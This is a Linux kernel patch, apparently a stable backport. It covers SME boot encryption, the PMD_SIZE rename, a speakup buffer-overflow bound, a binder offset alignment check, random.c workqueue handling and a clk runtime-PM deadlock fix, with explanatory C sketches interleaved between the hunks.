++++ b/arch/x86/mm/mem_encrypt_boot.S
+@@ -26,7 +26,7 @@ SYM_FUNC_START(sme_encrypt_execute)
+ 	 *   RCX - virtual address of the encryption workarea, including:
+ 	 *     - stack page (PAGE_SIZE)
+ 	 *     - encryption routine page (PAGE_SIZE)
+-	 *     - intermediate copy buffer (PMD_PAGE_SIZE)
++	 *     - intermediate copy buffer (PMD_SIZE)
+ 	 *    R8 - physical address of the pagetables to use for encryption
+ 	 */
+ 
+@@ -123,7 +123,7 @@ SYM_FUNC_START(__enc_copy)
+ 	wbinvd				/* Invalidate any cache entries */
+ 
+ 	/* Copy/encrypt up to 2MB at a time */
+-	movq	$PMD_PAGE_SIZE, %r12
++	movq	$PMD_SIZE, %r12
+ 1:
+ 	cmpq	%r12, %r9
+ 	jnb	2f
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index 06ccbd36e8dcd..f176098848749 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -41,6 +41,7 @@
+ #include <linux/mem_encrypt.h>
+ #include <linux/cc_platform.h>
+ 
++#include <asm/init.h>
+ #include <asm/setup.h>
+ #include <asm/sections.h>
+ #include <asm/cmdline.h>
+@@ -93,12 +94,12 @@ struct sme_populate_pgd_data {
+  * section is 2MB aligned to allow for simple pagetable setup using only
+  * PMD entries (see vmlinux.lds.S).
+  */
+-static char sme_workarea[2 * PMD_PAGE_SIZE] __section(".init.scratch");
++static char sme_workarea[2 * PMD_SIZE] __section(".init.scratch");
+ 
+ static char sme_cmdline_arg[] __initdata = "mem_encrypt";
+ static char sme_cmdline_on[]  __initdata = "on";
+ 
+-static void __init sme_clear_pgd(struct sme_populate_pgd_data *ppd)
++static void __head sme_clear_pgd(struct sme_populate_pgd_data *ppd)
+ {
+ 	unsigned long pgd_start, pgd_end, pgd_size;
+ 	pgd_t *pgd_p;
+@@ -113,7 +114,7 @@ static void __init sme_clear_pgd(struct sme_populate_pgd_data *ppd)
+ 	memset(pgd_p, 0, pgd_size);
+ }
+ 
+-static pud_t __init *sme_prepare_pgd(struct sme_populate_pgd_data *ppd)
++static pud_t __head *sme_prepare_pgd(struct sme_populate_pgd_data *ppd)
+ {
+ 	pgd_t *pgd;
+ 	p4d_t *p4d;
+@@ -150,7 +151,7 @@ static pud_t __init *sme_prepare_pgd(struct sme_populate_pgd_data *ppd)
+ 	return pud;
+ }
+ 
+-static void __init sme_populate_pgd_large(struct sme_populate_pgd_data *ppd)
++static void __head sme_populate_pgd_large(struct sme_populate_pgd_data *ppd)
+ {
+ 	pud_t *pud;
+ 	pmd_t *pmd;
+@@ -166,7 +167,7 @@ static void __init sme_populate_pgd_large(struct sme_populate_pgd_data *ppd)
+ 	set_pmd(pmd, __pmd(ppd->paddr | ppd->pmd_flags));
+ }
+ 
+-static void __init sme_populate_pgd(struct sme_populate_pgd_data *ppd)
++static void __head sme_populate_pgd(struct sme_populate_pgd_data *ppd)
+ {
+ 	pud_t *pud;
+ 	pmd_t *pmd;
+@@ -192,17 +193,17 @@ static void __init sme_populate_pgd(struct sme_populate_pgd_data *ppd)
+ 		set_pte(pte, __pte(ppd->paddr | ppd->pte_flags));
+ }
+ 
+-static void __init __sme_map_range_pmd(struct sme_populate_pgd_data *ppd)
++static void __head __sme_map_range_pmd(struct sme_populate_pgd_data *ppd)
+ {
+ 	while (ppd->vaddr < ppd->vaddr_end) {
+ 		sme_populate_pgd_large(ppd);
+ 
+-		ppd->vaddr += PMD_PAGE_SIZE;
+-		ppd->paddr += PMD_PAGE_SIZE;
++		ppd->vaddr += PMD_SIZE;
++		ppd->paddr += PMD_SIZE;
+ 	}
+ }
+ 
+-static void __init __sme_map_range_pte(struct sme_populate_pgd_data *ppd)
++static void __head __sme_map_range_pte(struct sme_populate_pgd_data *ppd)
+ {
+ 	while (ppd->vaddr < ppd->vaddr_end) {
+ 		sme_populate_pgd(ppd);
+@@ -212,7 +213,7 @@ static void __init __sme_map_range_pte(struct sme_populate_pgd_data *ppd)
+ 	}
+ }
+ 
+-static void __init __sme_map_range(struct sme_populate_pgd_data *ppd,
++static void __head __sme_map_range(struct sme_populate_pgd_data *ppd,
+ 				   pmdval_t pmd_flags, pteval_t pte_flags)
+ {
+ 	unsigned long vaddr_end;
+@@ -224,11 +225,11 @@ static void __init __sme_map_range(struct sme_populate_pgd_data *ppd,
+ 	vaddr_end = ppd->vaddr_end;
+ 
+ 	/* If start is not 2MB aligned, create PTE entries */
+-	ppd->vaddr_end = ALIGN(ppd->vaddr, PMD_PAGE_SIZE);
++	ppd->vaddr_end = ALIGN(ppd->vaddr, PMD_SIZE);
+ 	__sme_map_range_pte(ppd);
+ 
+ 	/* Create PMD entries */
+-	ppd->vaddr_end = vaddr_end & PMD_PAGE_MASK;
++	ppd->vaddr_end = vaddr_end & PMD_MASK;
+ 	__sme_map_range_pmd(ppd);
+ 
+ 	/* If end is not 2MB aligned, create PTE entries */
+@@ -236,22 +237,22 @@ static void __init __sme_map_range(struct sme_populate_pgd_data *ppd,
+ 	__sme_map_range_pte(ppd);
+ }
+ 
+-static void __init sme_map_range_encrypted(struct sme_populate_pgd_data *ppd)
++static void __head sme_map_range_encrypted(struct sme_populate_pgd_data *ppd)
+ {
+ 	__sme_map_range(ppd, PMD_FLAGS_ENC, PTE_FLAGS_ENC);
+ }
+ 
+-static void __init sme_map_range_decrypted(struct sme_populate_pgd_data *ppd)
++static void __head sme_map_range_decrypted(struct sme_populate_pgd_data *ppd)
+ {
+ 	__sme_map_range(ppd, PMD_FLAGS_DEC, PTE_FLAGS_DEC);
+ }
+ 
+-static void __init sme_map_range_decrypted_wp(struct sme_populate_pgd_data *ppd)
++static void __head sme_map_range_decrypted_wp(struct sme_populate_pgd_data *ppd)
+ {
+ 	__sme_map_range(ppd, PMD_FLAGS_DEC_WP, PTE_FLAGS_DEC_WP);
+ }
+ 
+-static unsigned long __init sme_pgtable_calc(unsigned long len)
++static unsigned long __head sme_pgtable_calc(unsigned long len)
+ {
+ 	unsigned long entries = 0, tables = 0;
+ 
+@@ -288,7 +289,7 @@ static unsigned long __init sme_pgtable_calc(unsigned long len)
+ 	return entries + tables;
+ }
+ 
+-void __init sme_encrypt_kernel(struct boot_params *bp)
++void __head sme_encrypt_kernel(struct boot_params *bp)
+ {
+ 	unsigned long workarea_start, workarea_end, workarea_len;
+ 	unsigned long execute_start, execute_end, execute_len;
+@@ -323,9 +324,8 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	 *     memory from being cached.
+ 	 */
+ 
+-	/* Physical addresses gives us the identity mapped virtual addresses */
+-	kernel_start = __pa_symbol(_text);
+-	kernel_end = ALIGN(__pa_symbol(_end), PMD_PAGE_SIZE);
++	kernel_start = (unsigned long)RIP_REL_REF(_text);
++	kernel_end = ALIGN((unsigned long)RIP_REL_REF(_end), PMD_SIZE);
+ 	kernel_len = kernel_end - kernel_start;
+ 
+ 	initrd_start = 0;
+@@ -342,25 +342,17 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	}
+ #endif
+ 
+-	/*
+-	 * We're running identity mapped, so we must obtain the address to the
+-	 * SME encryption workarea using rip-relative addressing.
+-	 */
+-	asm ("lea sme_workarea(%%rip), %0"
+-	     : "=r" (workarea_start)
+-	     : "p" (sme_workarea));
+-
+ 	/*
+ 	 * Calculate required number of workarea bytes needed:
+ 	 *   executable encryption area size:
+ 	 *     stack page (PAGE_SIZE)
+ 	 *     encryption routine page (PAGE_SIZE)
+-	 *     intermediate copy buffer (PMD_PAGE_SIZE)
++	 *     intermediate copy buffer (PMD_SIZE)
+ 	 *   pagetable structures for the encryption of the kernel
+ 	 *   pagetable structures for workarea (in case not currently mapped)
+ 	 */
+-	execute_start = workarea_start;
+-	execute_end = execute_start + (PAGE_SIZE * 2) + PMD_PAGE_SIZE;
++	execute_start = workarea_start = (unsigned long)RIP_REL_REF(sme_workarea);
++	execute_end = execute_start + (PAGE_SIZE * 2) + PMD_SIZE;
+ 	execute_len = execute_end - execute_start;
+ 
+ 	/*
+@@ -383,7 +375,7 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	 * before it is mapped.
+ 	 */
+ 	workarea_len = execute_len + pgtable_area_len;
+-	workarea_end = ALIGN(workarea_start + workarea_len, PMD_PAGE_SIZE);
++	workarea_end = ALIGN(workarea_start + workarea_len, PMD_SIZE);
+ 
+ 	/*
+ 	 * Set the address to the start of where newly created pagetable
+@@ -502,7 +494,7 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	native_write_cr3(__native_read_cr3());
+ }
+ 
+-void __init sme_enable(struct boot_params *bp)
++void __head sme_enable(struct boot_params *bp)
+ {
+ 	const char *cmdline_ptr, *cmdline_arg, *cmdline_on;
+ 	unsigned int eax, ebx, ecx, edx;
+diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
+index 5f0ce77a259d8..68d4f328f1696 100644
+--- a/arch/x86/mm/pat/set_memory.c
++++ b/arch/x86/mm/pat/set_memory.c
+@@ -747,11 +747,11 @@ phys_addr_t slow_virt_to_phys(void *__virt_addr)
+ 	switch (level) {
+ 	case PG_LEVEL_1G:
+ 		phys_addr = (phys_addr_t)pud_pfn(*(pud_t *)pte) << PAGE_SHIFT;
+-		offset = virt_addr & ~PUD_PAGE_MASK;
++		offset = virt_addr & ~PUD_MASK;
+ 		break;
+ 	case PG_LEVEL_2M:
+ 		phys_addr = (phys_addr_t)pmd_pfn(*(pmd_t *)pte) << PAGE_SHIFT;
+-		offset = virt_addr & ~PMD_PAGE_MASK;
++		offset = virt_addr & ~PMD_MASK;
+ 		break;
+ 	default:
+ 		phys_addr = (phys_addr_t)pte_pfn(*pte) << PAGE_SHIFT;
+@@ -1041,7 +1041,7 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
+ 	case PG_LEVEL_1G:
+ 		ref_prot = pud_pgprot(*(pud_t *)kpte);
+ 		ref_pfn = pud_pfn(*(pud_t *)kpte);
+-		pfninc = PMD_PAGE_SIZE >> PAGE_SHIFT;
++		pfninc = PMD_SIZE >> PAGE_SHIFT;
+ 		lpaddr = address & PUD_MASK;
+ 		lpinc = PMD_SIZE;
+ 		/*
+diff --git a/arch/x86/mm/pti.c b/arch/x86/mm/pti.c
+index ffe3b3a087fea..78414c6d1b5ed 100644
+--- a/arch/x86/mm/pti.c
++++ b/arch/x86/mm/pti.c
+@@ -592,7 +592,7 @@ static void pti_set_kernel_image_nonglobal(void)
+ 	 * of the image.
+ 	 */
+ 	unsigned long start = PFN_ALIGN(_text);
+-	unsigned long end = ALIGN((unsigned long)_end, PMD_PAGE_SIZE);
++	unsigned long end = ALIGN((unsigned long)_end, PMD_SIZE);
+ 
+ 	/*
+ 	 * This clears _PAGE_GLOBAL from the entire kernel image.
+diff --git a/drivers/accessibility/speakup/main.c b/drivers/accessibility/speakup/main.c
+index 73db0cb44fc7b..45d906f17ea3d 100644
+--- a/drivers/accessibility/speakup/main.c
++++ b/drivers/accessibility/speakup/main.c
+@@ -573,7 +573,7 @@ static u_long get_word(struct vc_data *vc)
+ 	}
+ 	attr_ch = get_char(vc, (u_short *)tmp_pos, &spk_attr);
+ 	buf[cnt++] = attr_ch;
+-	while (tmpx < vc->vc_cols - 1) {
++	while (tmpx < vc->vc_cols - 1 && cnt < sizeof(buf) - 1) {
+ 		tmp_pos += 2;
+ 		tmpx++;
+ 		ch = get_char(vc, (u_short *)tmp_pos, &temp);
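The speakup fix bounds the copy by the destination buffer as well as the
screen width, leaving room for the trailing element. The same pattern in
isolation:

#include <stdio.h>

int main(void)
{
        const char *src = "a source line longer than the destination";
        char buf[16];
        size_t cnt = 0;

        while (src[cnt] && cnt < sizeof(buf) - 1) {
                buf[cnt] = src[cnt];
                cnt++;
        }
        buf[cnt] = '\0';

        printf("%s\n", buf);    /* at most 15 characters copied */
        return 0;
}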
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 55cd17a13e758..8c2b7c074eca1 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -1707,8 +1707,10 @@ static size_t binder_get_object(struct binder_proc *proc,
+ 	size_t object_size = 0;
+ 
+ 	read_size = min_t(size_t, sizeof(*object), buffer->data_size - offset);
+-	if (offset > buffer->data_size || read_size < sizeof(*hdr))
++	if (offset > buffer->data_size || read_size < sizeof(*hdr) ||
++	    !IS_ALIGNED(offset, sizeof(u32)))
+ 		return 0;
++
+ 	if (u) {
+ 		if (copy_from_user(object, u + offset, read_size))
+ 			return 0;
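Besides the existing range checks, the binder fix rejects object offsets that
are not u32-aligned before reading the object header. A simplified
stand-alone version of the combined validity check:

#include <stdbool.h>
#include <stdio.h>

#define IS_ALIGNED(x, a)        (((x) & ((a) - 1)) == 0)

static bool object_offset_ok(unsigned long offset, unsigned long data_size,
                             unsigned long hdr_size)
{
        return offset <= data_size &&
               data_size - offset >= hdr_size &&
               IS_ALIGNED(offset, sizeof(unsigned int));
}

int main(void)
{
        /* aligned and in range vs. misaligned */
        printf("%d %d\n", object_offset_ok(8, 64, 8),
               object_offset_ok(6, 64, 8));
        return 0;
}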
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index 5d1c8e1c99b5b..fd57eb372d492 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -683,7 +683,7 @@ static void extract_entropy(void *buf, size_t len)
+ 
+ static void __cold _credit_init_bits(size_t bits)
+ {
+-	static struct execute_work set_ready;
++	static DECLARE_WORK(set_ready, crng_set_ready);
+ 	unsigned int new, orig, add;
+ 	unsigned long flags;
+ 
+@@ -699,8 +699,8 @@ static void __cold _credit_init_bits(size_t bits)
+ 
+ 	if (orig < POOL_READY_BITS && new >= POOL_READY_BITS) {
+ 		crng_reseed(); /* Sets crng_init to CRNG_READY under base_crng.lock. */
+-		if (static_key_initialized)
+-			execute_in_process_context(crng_set_ready, &set_ready);
++		if (static_key_initialized && system_unbound_wq)
++			queue_work(system_unbound_wq, &set_ready);
+ 		wake_up_interruptible(&crng_init_wait);
+ 		kill_fasync(&fasync, SIGIO, POLL_IN);
+ 		pr_notice("crng init done\n");
+@@ -870,8 +870,8 @@ void __init random_init(void)
+ 
+ 	/*
+ 	 * If we were initialized by the cpu or bootloader before jump labels
+-	 * are initialized, then we should enable the static branch here, where
+-	 * it's guaranteed that jump labels have been initialized.
++	 * or workqueues are initialized, then we should enable the static
++	 * branch here, where it's guaranteed that these have been initialized.
+ 	 */
+ 	if (!static_branch_likely(&crng_is_ready) && crng_init >= CRNG_READY)
+ 		crng_set_ready(NULL);
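The random.c change swaps execute_in_process_context() for a static work item
that is only queued once workqueues exist; if entropy is credited earlier,
random_init() runs the callback itself. A toy model of that "defer until the
infrastructure is up" decision:

#include <stdbool.h>
#include <stdio.h>

static bool workqueues_up;
static bool ready_work_deferred;

static void crng_set_ready(void)
{
        puts("crng marked ready");
}

static void credit_done(void)
{
        if (workqueues_up)
                crng_set_ready();       /* stands in for queue_work() */
        else
                ready_work_deferred = true;     /* picked up later */
}

int main(void)
{
        credit_done();                  /* too early: deferred */
        workqueues_up = true;
        if (ready_work_deferred)
                crng_set_ready();       /* the random_init() path */
        return 0;
}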
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index 9004e07182259..fe1d45eac837c 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -37,6 +37,10 @@ static HLIST_HEAD(clk_root_list);
+ static HLIST_HEAD(clk_orphan_list);
+ static LIST_HEAD(clk_notifier_list);
+ 
++/* List of registered clks that use runtime PM */
++static HLIST_HEAD(clk_rpm_list);
++static DEFINE_MUTEX(clk_rpm_list_lock);
++
+ static const struct hlist_head *all_lists[] = {
+ 	&clk_root_list,
+ 	&clk_orphan_list,
+@@ -59,6 +63,7 @@ struct clk_core {
+ 	struct clk_hw		*hw;
+ 	struct module		*owner;
+ 	struct device		*dev;
++	struct hlist_node	rpm_node;
+ 	struct device_node	*of_node;
+ 	struct clk_core		*parent;
+ 	struct clk_parent_map	*parents;
+@@ -122,6 +127,89 @@ static void clk_pm_runtime_put(struct clk_core *core)
+ 	pm_runtime_put_sync(core->dev);
+ }
+ 
++/**
++ * clk_pm_runtime_get_all() - Runtime "get" all clk provider devices
++ *
++ * Call clk_pm_runtime_get() on all runtime PM enabled clks in the clk tree so
++ * that disabling unused clks avoids a deadlock where a device is runtime PM
++ * resuming/suspending and the runtime PM callback is trying to grab the
++ * prepare_lock for something like clk_prepare_enable() while
++ * clk_disable_unused_subtree() holds the prepare_lock and is trying to runtime
++ * PM resume/suspend the device as well.
++ *
++ * Context: Acquires the 'clk_rpm_list_lock' and returns with the lock held on
++ * success. Otherwise the lock is released on failure.
++ *
++ * Return: 0 on success, negative errno otherwise.
++ */
++static int clk_pm_runtime_get_all(void)
++{
++	int ret;
++	struct clk_core *core, *failed;
++
++	/*
++	 * Grab the list lock to prevent any new clks from being registered
++	 * or unregistered until clk_pm_runtime_put_all().
++	 */
++	mutex_lock(&clk_rpm_list_lock);
++
++	/*
++	 * Runtime PM "get" all the devices that are needed for the clks
++	 * currently registered. Do this without holding the prepare_lock, to
++	 * avoid the deadlock.
++	 */
++	hlist_for_each_entry(core, &clk_rpm_list, rpm_node) {
++		ret = clk_pm_runtime_get(core);
++		if (ret) {
++			failed = core;
++			pr_err("clk: Failed to runtime PM get '%s' for clk '%s'\n",
++			       dev_name(failed->dev), failed->name);
++			goto err;
++		}
++	}
++
++	return 0;
++
++err:
++	hlist_for_each_entry(core, &clk_rpm_list, rpm_node) {
++		if (core == failed)
++			break;
++
++		clk_pm_runtime_put(core);
++	}
++	mutex_unlock(&clk_rpm_list_lock);
++
++	return ret;
++}
++
++/**
++ * clk_pm_runtime_put_all() - Runtime "put" all clk provider devices
++ *
++ * Put the runtime PM references taken in clk_pm_runtime_get_all() and release
++ * the 'clk_rpm_list_lock'.
++ */
++static void clk_pm_runtime_put_all(void)
++{
++	struct clk_core *core;
++
++	hlist_for_each_entry(core, &clk_rpm_list, rpm_node)
++		clk_pm_runtime_put(core);
++	mutex_unlock(&clk_rpm_list_lock);
++}
++
++static void clk_pm_runtime_init(struct clk_core *core)
++{
++	struct device *dev = core->dev;
++
++	if (dev && pm_runtime_enabled(dev)) {
++		core->rpm_enabled = true;
++
++		mutex_lock(&clk_rpm_list_lock);
++		hlist_add_head(&core->rpm_node, &clk_rpm_list);
++		mutex_unlock(&clk_rpm_list_lock);
++	}
++}
++
+ /***           locking             ***/
+ static void clk_prepare_lock(void)
+ {
+@@ -1310,9 +1398,6 @@ static void __init clk_unprepare_unused_subtree(struct clk_core *core)
+ 	if (core->flags & CLK_IGNORE_UNUSED)
+ 		return;
+ 
+-	if (clk_pm_runtime_get(core))
+-		return;
+-
+ 	if (clk_core_is_prepared(core)) {
+ 		trace_clk_unprepare(core);
+ 		if (core->ops->unprepare_unused)
+@@ -1321,8 +1406,6 @@ static void __init clk_unprepare_unused_subtree(struct clk_core *core)
+ 			core->ops->unprepare(core->hw);
+ 		trace_clk_unprepare_complete(core);
+ 	}
+-
+-	clk_pm_runtime_put(core);
+ }
+ 
+ static void __init clk_disable_unused_subtree(struct clk_core *core)
+@@ -1338,9 +1421,6 @@ static void __init clk_disable_unused_subtree(struct clk_core *core)
+ 	if (core->flags & CLK_OPS_PARENT_ENABLE)
+ 		clk_core_prepare_enable(core->parent);
+ 
+-	if (clk_pm_runtime_get(core))
+-		goto unprepare_out;
+-
+ 	flags = clk_enable_lock();
+ 
+ 	if (core->enable_count)
+@@ -1365,8 +1445,6 @@ static void __init clk_disable_unused_subtree(struct clk_core *core)
+ 
+ unlock_out:
+ 	clk_enable_unlock(flags);
+-	clk_pm_runtime_put(core);
+-unprepare_out:
+ 	if (core->flags & CLK_OPS_PARENT_ENABLE)
+ 		clk_core_disable_unprepare(core->parent);
+ }
+@@ -1382,12 +1460,22 @@ __setup("clk_ignore_unused", clk_ignore_unused_setup);
+ static int __init clk_disable_unused(void)
+ {
+ 	struct clk_core *core;
++	int ret;
+ 
+ 	if (clk_ignore_unused) {
+ 		pr_warn("clk: Not disabling unused clocks\n");
+ 		return 0;
+ 	}
+ 
++	pr_info("clk: Disabling unused clocks\n");
++
++	ret = clk_pm_runtime_get_all();
++	if (ret)
++		return ret;
++	/*
++	 * Grab the prepare lock to keep the clk topology stable while iterating
++	 * over clks.
++	 */
+ 	clk_prepare_lock();
+ 
+ 	hlist_for_each_entry(core, &clk_root_list, child_node)
+@@ -1404,6 +1492,8 @@ static int __init clk_disable_unused(void)
+ 
+ 	clk_prepare_unlock();
+ 
++	clk_pm_runtime_put_all();
++
+ 	return 0;
+ }
+ late_initcall_sync(clk_disable_unused);
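
Taken together, clk_pm_runtime_get_all() and clk_pm_runtime_put_all() let
clk_disable_unused() resume every provider before the prepare_lock is
taken, so no runtime PM transition can race with the tree walk. A hedged
sketch of the resulting call ordering, with the walk elided and
example_walk() as a made-up stand-in for clk_disable_unused():

	static int example_walk(void)
	{
		int ret;

		/* takes clk_rpm_list_lock and "gets" every provider */
		ret = clk_pm_runtime_get_all();
		if (ret)
			return ret;

		clk_prepare_lock();	/* topology stable, no PM calls inside */
		/* ... iterate clk_root_list and clk_orphan_list ... */
		clk_prepare_unlock();

		/* drops the references and clk_rpm_list_lock */
		clk_pm_runtime_put_all();

		return 0;
	}

This ordering is also why the per-clk clk_pm_runtime_get()/put() pairs
could be deleted from the two subtree helpers above.
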
+@@ -3115,28 +3205,41 @@ static void clk_summary_show_one(struct seq_file *s, struct clk_core *c,
+ 				 int level)
+ {
+ 	int phase;
++	struct clk *clk_user;
++	int multi_node = 0;
+ 
+-	seq_printf(s, "%*s%-*s %7d %8d %8d %11lu %10lu ",
++	seq_printf(s, "%*s%-*s %-7d %-8d %-8d %-11lu %-10lu ",
+ 		   level * 3 + 1, "",
+-		   30 - level * 3, c->name,
++		   35 - level * 3, c->name,
+ 		   c->enable_count, c->prepare_count, c->protect_count,
+ 		   clk_core_get_rate_recalc(c),
+ 		   clk_core_get_accuracy_recalc(c));
+ 
+ 	phase = clk_core_get_phase(c);
+ 	if (phase >= 0)
+-		seq_printf(s, "%5d", phase);
++		seq_printf(s, "%-5d", phase);
+ 	else
+ 		seq_puts(s, "-----");
+ 
+-	seq_printf(s, " %6d", clk_core_get_scaled_duty_cycle(c, 100000));
++	seq_printf(s, " %-6d", clk_core_get_scaled_duty_cycle(c, 100000));
+ 
+ 	if (c->ops->is_enabled)
+-		seq_printf(s, " %9c\n", clk_core_is_enabled(c) ? 'Y' : 'N');
++		seq_printf(s, " %5c ", clk_core_is_enabled(c) ? 'Y' : 'N');
+ 	else if (!c->ops->enable)
+-		seq_printf(s, " %9c\n", 'Y');
++		seq_printf(s, " %5c ", 'Y');
+ 	else
+-		seq_printf(s, " %9c\n", '?');
++		seq_printf(s, " %5c ", '?');
++
++	hlist_for_each_entry(clk_user, &c->clks, clks_node) {
++		seq_printf(s, "%*s%-*s  %-25s\n",
++			   level * 3 + 2 + 105 * multi_node, "",
++			   30,
++			   clk_user->dev_id ? clk_user->dev_id : "deviceless",
++			   clk_user->con_id ? clk_user->con_id : "no_connection_id");
++
++		multi_node = 1;
++	}
++
+ }
+ 
+ static void clk_summary_show_subtree(struct seq_file *s, struct clk_core *c,
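
The clk_summary_show_one() hunk above switches the debugfs row to
left-aligned fields and then emits one line per consumer of the clk. A
rough, user-space illustration of the new layout, reusing the patch's
format strings with printf(); clk_example and all field values are
fabricated for display only:

	#include <stdio.h>

	int main(void)
	{
		int level = 0;

		/* clock row: counts, rate, accuracy */
		printf("%*s%-*s %-7d %-8d %-8d %-11lu %-10lu ",
		       level * 3 + 1, "", 35 - level * 3, "clk_example",
		       1, 1, 0, 24000000UL, 0UL);
		printf("%-5d", 0);	/* phase */
		printf(" %-6d", 50000);	/* duty cycle */
		printf(" %5c ", 'Y');	/* hardware enable */
		/* the first consumer entry continues the same row */
		printf("%*s%-*s  %-25s\n", level * 3 + 2, "", 30,
		       "deviceless", "no_connection_id");
		return 0;
	}
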
+@@ -3144,9 +3247,7 @@ static void clk_summary_show_subtree(struct seq_file *s, struct clk_core *c,
+ {
+ 	struct clk_core *child;
+ 
+-	clk_pm_runtime_get(c);
+ 	clk_summary_show_one(s, c, level);
+-	clk_pm_runtime_put(c);
+ 
+ 	hlist_for_each_entry(child, &c->children, child_node)
+ 		clk_summary_show_subtree(s, child, level + 1);
+@@ -3155,11 +3256,16 @@ static void clk_summary_show_subtree(struct seq_file *s, struct clk_core *c,
+ static int clk_summary_show(struct seq_file *s, void *data)
+ {
+ 	struct clk_core *c;
+-	struct hlist_head **lists = (struct hlist_head **)s->private;
++	struct hlist_head **lists = s->private;
++	int ret;
+ 
+-	seq_puts(s, "                                 enable  prepare  protect                                duty  hardware\n");
+-	seq_puts(s, "   clock                          count    count    count        rate   accuracy phase  cycle    enable\n");
+-	seq_puts(s, "-------------------------------------------------------------------------------------------------------\n");
++	seq_puts(s, "                                 enable  prepare  protect                                duty  hardware                            connection\n");
++	seq_puts(s, "   clock                          count    count    count        rate   accuracy phase  cycle    enable   consumer                         id\n");
++	seq_puts(s, "---------------------------------------------------------------------------------------------------------------------------------------------\n");
++
++	ret = clk_pm_runtime_get_all();
++	if (ret)
++		return ret;
+ 
+ 	clk_prepare_lock();
+ 
+@@ -3168,6 +3274,7 @@ static int clk_summary_show(struct seq_file *s, void *data)
+ 			clk_summary_show_subtree(s, c, 0);
+ 
+ 	clk_prepare_unlock();
++	clk_pm_runtime_put_all();
+ 
+ 	return 0;
+ }
+@@ -3214,9 +3321,15 @@ static int clk_dump_show(struct seq_file *s, void *data)
+ {
+ 	struct clk_core *c;
+ 	bool first_node = true;
+-	struct hlist_head **lists = (struct hlist_head **)s->private;
++	struct hlist_head **lists = s->private;
++	int ret;
++
++	ret = clk_pm_runtime_get_all();
++	if (ret)
++		return ret;
+ 
+ 	seq_putc(s, '{');
++
+ 	clk_prepare_lock();
+ 
+ 	for (; *lists; lists++) {
+@@ -3229,6 +3342,7 @@ static int clk_dump_show(struct seq_file *s, void *data)
+ 	}
+ 
+ 	clk_prepare_unlock();
++	clk_pm_runtime_put_all();
+ 
+ 	seq_puts(s, "}\n");
+ 	return 0;
+@@ -3836,8 +3950,6 @@ static int __clk_core_init(struct clk_core *core)
+ 	}
+ 
+ 	clk_core_reparent_orphans_nolock();
+-
+-	kref_init(&core->ref);
+ out:
+ 	clk_pm_runtime_put(core);
+ unlock:
+@@ -4066,6 +4178,22 @@ static void clk_core_free_parent_map(struct clk_core *core)
+ 	kfree(core->parents);
+ }
+ 
++/* Free memory allocated for a struct clk_core */
++static void __clk_release(struct kref *ref)
++{
++	struct clk_core *core = container_of(ref, struct clk_core, ref);
++
++	if (core->rpm_enabled) {
++		mutex_lock(&clk_rpm_list_lock);
++		hlist_del(&core->rpm_node);
++		mutex_unlock(&clk_rpm_list_lock);
++	}
++
++	clk_core_free_parent_map(core);
++	kfree_const(core->name);
++	kfree(core);
++}
++
+ static struct clk *
+ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ {
+@@ -4086,6 +4214,8 @@ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ 		goto fail_out;
+ 	}
+ 
++	kref_init(&core->ref);
++
+ 	core->name = kstrdup_const(init->name, GFP_KERNEL);
+ 	if (!core->name) {
+ 		ret = -ENOMEM;
+@@ -4098,9 +4228,8 @@ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ 	}
+ 	core->ops = init->ops;
+ 
+-	if (dev && pm_runtime_enabled(dev))
+-		core->rpm_enabled = true;
+ 	core->dev = dev;
++	clk_pm_runtime_init(core);
+ 	core->of_node = np;
+ 	if (dev && dev->driver)
+ 		core->owner = dev->driver->owner;
+@@ -4140,12 +4269,10 @@ __clk_register(struct device *dev, struct device_node *np, struct clk_hw *hw)
+ 	hw->clk = NULL;
+ 
+ fail_create_clk:
+-	clk_core_free_parent_map(core);
+ fail_parents:
+ fail_ops:
+-	kfree_const(core->name);
+ fail_name:
+-	kfree(core);
++	kref_put(&core->ref, __clk_release);
+ fail_out:
+ 	return ERR_PTR(ret);
+ }
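
Initializing the kref right after allocation means every failure label in
__clk_register() can now unwind through a single kref_put(), with
__clk_release() as the one place that frees the parent map, the name and
the clk_core itself. A hedged fragment mirroring the patched error
handling (surrounding code elided, names as in the patch):

	core = kzalloc(sizeof(*core), GFP_KERNEL);
	if (!core)
		return ERR_PTR(-ENOMEM);

	kref_init(&core->ref);	/* __clk_release() owns freeing from here */

	core->name = kstrdup_const(init->name, GFP_KERNEL);
	if (!core->name) {
		ret = -ENOMEM;
		goto fail_name;	/* falls through to the kref_put() below */
	}
	/* ... */
	fail_name:
		kref_put(&core->ref, __clk_release);
		return ERR_PTR(ret);

Note that __clk_release() also unlinks the core from clk_rpm_list, which
is why it no longer asserts that the prepare_lock is held.
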
+@@ -4225,18 +4352,6 @@ int of_clk_hw_register(struct device_node *node, struct clk_hw *hw)
+ }
+ EXPORT_SYMBOL_GPL(of_clk_hw_register);
+ 
+-/* Free memory allocated for a clock. */
+-static void __clk_release(struct kref *ref)
+-{
+-	struct clk_core *core = container_of(ref, struct clk_core, ref);
+-
+-	lockdep_assert_held(&prepare_lock);
+-
+-	clk_core_free_parent_map(core);
+-	kfree_const(core->name);
+-	kfree(core);
+-}
+-
+ /*
+  * Empty clk_ops for unregistered clocks. These are used temporarily
+  * after clk_unregister() was called on a clock and until last clock
+diff --git a/drivers/clk/mediatek/clk-gate.c b/drivers/clk/mediatek/clk-gate.c
+index 0c867136e49d7..67d9e741c5e73 100644
